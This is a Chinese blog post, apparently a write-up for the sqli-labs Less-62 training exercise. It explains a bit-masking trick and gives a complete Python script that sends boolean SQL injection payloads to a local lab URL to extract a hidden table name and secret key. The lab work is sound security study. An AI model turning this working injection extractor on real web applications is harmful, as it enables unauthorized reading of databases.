Sqli labs less 62
2021/9/30 19:11:37
本文主要是介绍Sqli labs less 62,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
1.本题是通过布尔注入获取一段secret key,该key存于challenges
数据库的某个随机表名的表内。要求在请求次数不超过130次的情况下获取该key。
2.根据网上的wp,跑脚本
原理:在获取表名或key时,我们判断第7位(比特)是不是1就知道该字符是数字或字母;而第6位不用管,因为对于数字,该位为1,对于字母,我们不用管字母的大小写也就不用管该位是0还是1。所以对于每个字符,我们只需获取第7位和前5位即可。#!/usr/bin/python3 # -*-coding:utf-8-*- import re import requests url = "http://192.168.2.140:8083/Less-62/index.php" # 改成你的地址 try_count = 0 def extract_bits(query, i, bit_values: list): """ 获取query执行结果的第 i 个(从1开始算)字符的3个比特 哪3个比特由bit_values指定 """ global try_count assert len(bit_values) == 8 bit_marks = 0 for v in bit_values: bit_marks |= v payload = """ '+( SELECT CASE ASCII(SUBSTRING(({query}), {i}, 1)) & ({bit_mark}) WHEN {0} THEN 1 WHEN {1} THEN 2 WHEN {2} THEN 3 WHEN {3} THEN 4 WHEN {4} THEN 5 WHEN {5} THEN 6 WHEN {6} THEN 7 ELSE 8 END )+' """.format(*bit_values[:7], query=query, bit_mark=bit_marks, i=i) payload = re.sub(r'\s+', ' ', payload.strip().replace("\n", " ")) # print(payload) resp = requests.get(url, params={"id": payload}) try_count += 1 infos = ["Angelina", "Dummy", "secure", "stupid", "superman", "batman", "admin", "admin1"] match = re.search(r"Your Login name : (.*?)<br>", resp.text) assert match assert match.group(1) in infos bits = bit_values[infos.index(match.group(1))] return bits def extract_data(query, length): """ 获取query查询结果的length个字符,每个字符只获取其第7位和前5位 """ res = "" for i in range(1, length+1): b2 = extract_bits(query, i, [0b00000000, 0b00000001, 0b00000010, 0b00000011, 0b00000100, 0b00000101, 0b00000110, 0b00000111]) # 00000111 b1 = extract_bits(query, i, [0b00000000, 0b00001000, 0b00010000, 0b00011000, 0b01000000, 0b01001000, 0b01010000, 0b01011000]) # 01011000 if b1 & 0b01000000 == 0: # 该字符为数字 bit = b1 | b2 | 0b00100000 else: # 该字符为字母 bit = b1 | b2 res += chr(bit) return res if __name__ == "__main__": table_name = extract_data("select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1", 10) print("table_name:", table_name) secret_key = extract_data("select c from (select 1 as a, 2 as b, 3 as c, 4 as d union select * from challenges.%s limit 1,1)x" % table_name, 24) print("secret_key:", secret_key) print("Done. try_count:", try_count)
3.获取数据
这篇关于Sqli labs less 62的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-19永别了,微服务架构!
- 2024-05-15鸿蒙生态设备数量超8亿台
- 2024-05-13TiDB + ES:转转业财系统亿级数据存储优化实践
- 2024-05-09“2024鸿蒙零基础快速实战-仿抖音App开发(ArkTS版)”实战课程已上线
- 2024-05-09聊聊如何通过arthas-tunnel-server来远程管理所有需要arthas监控的应用
- 2024-05-09log4j2这么配就对了
- 2024-05-09nginx修改Content-Type
- 2024-05-09Redis多数据源,看这篇就够了
- 2024-05-09Google Chrome驱动程序 124.0.6367.62(正式版本)去哪下载?
- 2024-05-09有没有大佬知道这种数据应该怎么抓取呀?